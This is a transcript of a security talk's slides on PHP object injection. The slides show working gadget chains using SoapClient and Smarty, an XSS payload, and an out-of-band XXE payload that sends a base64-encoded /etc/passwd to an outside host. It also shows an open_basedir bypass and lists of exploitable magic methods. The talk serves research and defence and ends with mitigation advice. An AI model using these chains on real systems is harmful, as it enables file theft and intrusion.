Transcript

PHP magic methods

__clone()

SOAP Call to api.php

SoapClient generates SoapFault exception

But if we use Out-of-band technique...

XXE will be triggered automagically!

Some new stuff

Examples

$host = 'localhost';
$port = 4242;
$server = Net_Server::create('sequential', $host, $port);
$handler = new Net_Server_Handler_Log();
$server->setCallbackObject($handler);
$server->start();

vBulletin 5

log4php

http://logging.apache.org/log4php/

class Net_Server_Handler_Log extends Net_Server_Handler {
    private $hierarchy;

    function onStart() {
        $this->hierarchy = Logger::getRootLogger();
    }

    function onReceiveData($clientId = 0, $data = "") {
        $events = $this->getEvents($data);
        foreach($events as $event) {
            $root = $this->hierarchy->getRootLogger();
            if($event->getLoggerName() === 'root') {
                $root->callAppenders($event);
            } else {
                $loggers = $this->hierarchy->getCurrentLoggers();
                foreach($loggers as $logger) {
                    $root->callAppenders($event);
                    $appenders = $logger->getAllAppenders();
                    foreach($appenders as $appender) {
                        $appender->doAppend($event);
                    }
                }
            }
        }
    }

    function getEvents($data) {
        if (preg_match('/^<log4php:event/', $data)) {
            throw new Exception("Please use 'log4php.appender.default.useXml = false' in appender_socket.properties file!");
        }
        preg_match('/^(O:\d+)/', $data, $parts);
        $events = split($parts[1], $data);
        array_shift($events);
        $size = count($events);
        for($i=0; $i<$size; $i++) {
            $events[$i] = unserialize($parts[1].$events[$i]);
        }
        return $events;
    }
}

Let's use PHP classes instead!

appender_console.php

appender_dailyfile.php

appender_echo.php

appender_file.php

appender_mailevent.php

appender_mail.php

appender_mongodb.php

appender_null.php

appender_pdo.php

appender_php.php

appender_rollingfile.php

appender_socket.php

appender_socket_server.php

appender_syslog.php

cache.php

configurator_basic.php

configurator_php.php

configurator_xml.php

filter_denyall.php

filter_levelmatch.php

filter_levelrange.php

filter_stringmatch.php

layout_html.php

layout_pattern.php

layout_simple.php

layout_ttcc.php

layout_xml.php

mdc.php

ndc.php

renderer_default.php

renderer_map.php

simple.php

Thanks!

  • core
  • libraries
  • log4php
  • examples (no 403!)

Questions?

PHP Object Injection Revisited

Arseny Reutov

me@raz0r.name @ru_raz0r

  • used by CMS Made Simple, SugarCRM, vtiger, etc.
  • contains handy "examples" dir
  • vBulletin just cloned the repo leaving examples and did not protect it

No useful magic methods in log4php

But a method is called on unserialized object

So what?

Options

public SoapClient::SoapClient ( mixed $wsdl [, array $options ] )

XSS

WSDL - Web Services Description Language

Get all the magic methods!

$event = new SoapClient(null, array('location' => 'http://raz0r.name/api.php', 'uri' => 'http://raz0r.name/'));

$event->getLoggerName();

WSDL mode

Non-WSDL mode

$wsdl = "http://somehost/api.wsdl"

$wsdl = null

Object survives serialization :)

Proper serialization is not implemented when SoapClient is initialized in WSDL mode :(

Exception::__toString

ErrorException::__toString

DateTime::__wakeup

DOMException::__toString

LogicException::__toString

BadFunctionCallException::__toString

BadMethodCallException::__toString

DomainException::__toString

InvalidArgumentException::__toString

LengthException::__toString

OutOfRangeException::__toString

RuntimeException::__toString

OutOfBoundsException::__toString

OverflowException::__toString

RangeException::__toString

UnderflowException::__toString

UnexpectedValueException::__toString

CachingIterator::__toString

RecursiveCachingIterator::__toString

SplFileInfo::__toString

DirectoryIterator::__toString

FilesystemIterator::__toString

RecursiveDirectoryIterator::__toString

GlobIterator::__toString

SplFileObject::__toString

SplTempFileObject::__toString

ReflectionException::__toString

ReflectionFunctionAbstract::__toString

ReflectionFunction::__toString

ReflectionParameter::__toString

ReflectionMethod::__toString

ReflectionClass::__toString

ReflectionObject::__toString

ReflectionProperty::__toString

ReflectionExtension::__toString

PharException::__toString

Phar::__destruct

Phar::__toString

PharData::__destruct

PharData::__toString

PharFileInfo::__destruct

PharFileInfo::__toString

SimpleXMLElement::__toString

SimpleXMLIterator::__toString

SoapClient::__call

SoapFault::__toString

mysqli_sql_exception::__toString

PDOException::__toString

PDO::__wakeup

PDOStatement::__wakeup

<?php

header("HTTP/1.0 404 <script>alert(1);</script>");

location

uri

style

use

soap_version

login

password

proxy_host

proxy_port

proxy_login

proxy_password

local_cert

passphrase

authentication

compression

encoding

trace

classmap

exceptions

connection_timeout

typemap

type_name

type_ns

from_xml

cache_wsdl

user_agent

stream_context

features

keep_alive

$classes = get_declared_classes();
foreach($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(/* magic methods */))) {
            print $class . '::' . $method . "\n";
        }
    }
}

__call() is triggered when invoking inaccessible methods in an object context

new SoapClient(null, array('location' => 'http://raz0r.name/api.php',
    'uri' => 'http://raz0r.name/'));

Fatal error: Uncaught SoapFault exception: [HTTP] <script>alert(1);</script> in appender_socket_server.php:71

Does not filter anything

Arseny Reutov

$ whoami

Web application security researcher you have never heard of

PHP hater since 2006

Casual CTF player, random bug bounties participant, bla bla

me@raz0r.name @ru_raz0r

open_basedir bypass

XXE

Smarty!

$c = new SoapClient(null, array('uri'=>'http://raz0r.name/', 'location'=>'http://raz0r.name/xxe.xml'));

$c->getLoggerName();

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [

<!ENTITY % a SYSTEM "http://bugsand.hol.es/3_deep?php://filter/read=convert.base64-encode/resource=/etc/passwd">

%a;

%intern;

%trick;

]>

Smarty_Internal_Template

SoapClient can cache WSDL files locally

public function __destruct()
{
    if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
        $this->cached->handler->releaseLock($this->smarty, $this->cached);
    }
}

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:////etc/passwd">]>

class Smarty {
    public $cache_locking = true;
}

class Smarty_Template_Cached {
    public $is_locked = true;

    public function __construct() {
        $this->handler = new SoapClient(null, array(
            'uri' => 'http://raz0r.name/',
            'location' => 'http://raz0r.name/xxe.xml')
        );
    }
}

class Smarty_Internal_Template {
    public function __construct() {
        $this->smarty = new Smarty();
        $this->cached = new Smarty_Template_Cached();
    }
}

$c = serialize(new Smarty_Internal_Template());

ini_set('open_basedir', '/var/www/site/');
ini_set('soap.wsdl_cache_enabled', true);
ini_set('soap.wsdl_cache_dir', '/var/www/');
$c = new SoapClient('http://raz0r.name/test.wsdl', array('cache_wsdl' => WSDL_CACHE_DISK));

Fatal error: Uncaught SoapFault exception: [Client] DTD are not supported by SOAP

GET /result?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

Host: bugsand.hol.es

Connection: close

open_basedir restriction in effect?

Nope!

-rw------- 1 www-data www-data 530 2013-04-17 13:55 wsdl-raz0r-c7c3f5871a779534f433fa6fa878b92c

Kudos to Alexey Osipov and Timur Yunusov from Positive Technologies

Boring stuff

Some future stuff

But...

What about PHP?

Deserialize bugs in 2013, you kiddin?

Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution (CVE-2012-5692)

What is actually PHP Object Injection?

So we have unserialize...

What if a PHP framework is implemented as a PHP extension?

Joomla! <= 3.0.2 (highlight.php) PHP Object Injection vulnerability (CVE-2013-1453)

The whole Phalcon class userspace is exposed to the users of shared hosting even if they do not use it

Actually still alive, just remember Ruby and YAML (CVE-2013-0156, CVE-2013-0333)

No new concepts since "Shocking news in PHP exploitation" by Stefan Esser (2009)

Phalcon is a web framework implemented as a C extension offering high performance and lower resource consumption.

CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection vulnerability (CVE-2013-1465)

all by Egidio Romano

__wakeup -> fopen -> __toString()

__wakeup()

class Foo {
    public $bar = "baz";
}

CakePHP <= 1.3.5 / 1.2.8

__destruct

serialize()

O:3:"Foo":1:{s:3:"bar";s:3:"baz";}

So...

POST /

Phalcon\Exception::__toString

Phalcon\DI\Injectable::__get

Phalcon\DI::__call

Phalcon\Forms\Element::__toString

Phalcon\Mvc\View\Engine::__get

Phalcon\Mvc\Model\Exception::__toString

Phalcon\Config::__set_state

Phalcon\DI\FactoryDefault::__call

Phalcon\Cache\Exception::__toString

Phalcon\Tag\Exception::__toString

Phalcon\Paginator\Exception::__toString

Phalcon\Validation::__get

Phalcon\Validation\Message::__toString

Phalcon\Validation\Message::__set_state

Phalcon\Validation\Exception::__toString

Phalcon\Validation\Message\Group::__set_state

Phalcon\Db\Index::__set_state

Phalcon\Db\Column::__set_state

Phalcon\Db\Exception::__toString

Phalcon\Db\Reference::__set_state

Phalcon\Db\RawValue::__toString

Phalcon\Acl\Role::__toString

Phalcon\Acl\Resource::__toString

Phalcon\Acl\Exception::__toString

Phalcon\Security\Exception::__toString

Phalcon\Session\Bag::__set

Phalcon\Session\Bag::__get

Phalcon\Session\Bag::__isset

Phalcon\Session\Bag::__unset

Phalcon\Session\Exception::__toString

Phalcon\DI\Exception::__toString

Phalcon\DI\FactoryDefault\CLI::__call

Phalcon\DI\Service::__set_state

Phalcon\Filter\Exception::__toString

Phalcon\Flash\Exception::__toString

Phalcon\CLI\Task::__get

Phalcon\CLI\Console\Exception::__toString

Phalcon\CLI\Dispatcher\Exception::__toString

Phalcon\CLI\Router\Exception::__toString

Phalcon\Annotations\Exception::__toString

Phalcon\Annotations\Reflection::__set_state

Phalcon\Loader\Exception::__toString

Phalcon\Logger\Exception::__toString

Phalcon\Logger\Adapter\File::__wakeup

Phalcon\Config\Exception::__toString

Phalcon\Config\Adapter\Ini::__set_state

Phalcon\Forms\Form::__get

Phalcon\Forms\Exception::__toString

Phalcon\Forms\Element\File::__toString

Phalcon\Forms\Element\Text::__toString

Phalcon\Forms\Element\Date::__toString

Phalcon\Forms\Element\Hidden::__toString

Phalcon\Forms\Element\Numeric::__toString

Phalcon\Forms\Element\Submit::__toString

Phalcon\Forms\Element\Check::__toString

Phalcon\Forms\Element\Select::__toString

Phalcon\Forms\Element\Password::__toString

Phalcon\Forms\Element\TextArea::__toString

Phalcon\Translate\Exception::__toString

Phalcon\Crypt\Exception::__toString

Phalcon\Escaper\Exception::__toString

Phalcon\Assets\Exception::__toString

Phalcon\Http\Cookie::__toString

Phalcon\Http\Cookie\Exception::__toString

Phalcon\Http\Response\Headers::__set_state

Phalcon\Http\Request\Exception::__toString

Phalcon\Http\Response\Exception::__toString

Phalcon\Mvc\View::__set

Phalcon\Mvc\View::__get

Phalcon\Mvc\Micro::__get

Phalcon\Mvc\Model::__call

Phalcon\Mvc\Model::__callStatic

Phalcon\Mvc\Model::__set

Phalcon\Mvc\Model::__get

Phalcon\Mvc\Model::__isset

Phalcon\Mvc\Application::__get

Phalcon\Mvc\Application\Exception::__toString

Phalcon\Mvc\Controller::__get

Phalcon\Mvc\Collection\Exception::__toString

Phalcon\Mvc\Dispatcher\Exception::__toString

Phalcon\Mvc\Micro\LazyLoader::__call

Phalcon\Mvc\Micro\Exception::__toString

Phalcon\Mvc\Model\Message::__toString

Phalcon\Mvc\Model\Message::__set_state

Phalcon\Mvc\Model\ValidationFailed::__toString

Phalcon\Mvc\Model\Transaction\Failed::__toString

Phalcon\Mvc\Model\Transaction\Exception::__toString

Phalcon\Mvc\Router\Exception::__toString

Phalcon\Mvc\User\Plugin::__get

Phalcon\Mvc\User\Module::__get

Phalcon\Mvc\Url\Exception::__toString

Phalcon\Mvc\User\Component::__get

Phalcon\Mvc\View\Exception::__toString

Phalcon\Mvc\View\Engine\Php::__get

Phalcon\Mvc\View\Engine\Volt::__get

Phalcon\Events\Exception::__toString

Why only __destruct and web app's classes?

do not unserialize user-supplied data!
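
One way to apply this rule to a handler like the log4php socket server shown earlier, as an added example that is not code from the talk or from log4php: restrict unserialize() to an allowlist and type-check the result before any method is called on it. EventStub, GadgetStub and decodeEvent() are hypothetical names, and the allowed_classes option assumes PHP 7.0 or later.

```php
<?php
// Added example; EventStub, GadgetStub and decodeEvent() are hypothetical names.

// Stand-in for the logging event class the handler expects to receive.
class EventStub {
    public $loggerName = 'root';
    public function getLoggerName() { return $this->loggerName; }
}

// Stand-in for any class whose __call() turns an unknown method call
// into a side effect (the role SoapClient::__call plays in the talk).
class GadgetStub {
    public static $calls = 0;
    public function __call($name, $args) { self::$calls++; return 'root'; }
}

// Decode one serialized event. Only EventStub may be instantiated; every
// other class name in the stream becomes __PHP_Incomplete_Class.
function decodeEvent(string $data): ?EventStub {
    $obj = @unserialize($data, ['allowed_classes' => [EventStub::class]]);
    // Type-check before calling anything on the result.
    return $obj instanceof EventStub ? $obj : null;
}

// Constructed sample inputs.
$good = serialize(new EventStub());
$bad  = serialize(new GadgetStub());

// Unrestricted unserialize(): the method call reaches GadgetStub::__call.
unserialize($bad)->getLoggerName();
$callsBefore = GadgetStub::$calls;

// Allowlisted decode: the gadget is never instantiated, so nothing is called on it.
$accepted = decodeEvent($good);
$rejected = decodeEvent($bad);
$callsAfter = GadgetStub::$calls;

var_dump($accepted instanceof EventStub); // the expected event type passes
var_dump($rejected === null);             // the unexpected class is refused
var_dump($callsAfter === $callsBefore);   // no further __call() was triggered
```

The allowlist limits which classes can be instantiated, not what an allowed class does in its own __wakeup() or __destruct(), so a plain data format such as JSON remains the safer transport for untrusted input.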

__construct()

__destruct()

__call()

__callStatic()

__get()

__set()

__isset()

__unset()

__sleep()

__wakeup()

__toString()

__invoke()

__set_state()

Vulnerable PHP Web Application

function __destruct() {
    if ($this->__cache) {
        $core = App::core('cake');
        unset($this->__paths[rtrim($core[0], DS)]);
        Cache::write('dir_map', array_filter($this->__paths),'_cake_core_');
        Cache::write('file_map', array_filter($this->__map),'_cake_core_');
        Cache::write('object_map', $this->__objects, '_cake_core_');
    }
}

init any class and execute arbitrary methods

unserialize()

  • Is called when object is freed, i.e. on script termination
  • May contain dangerous code, when deserialized

object(Foo)#2 (1) {
  ["bar"]=>
  string(3) "baz"
}
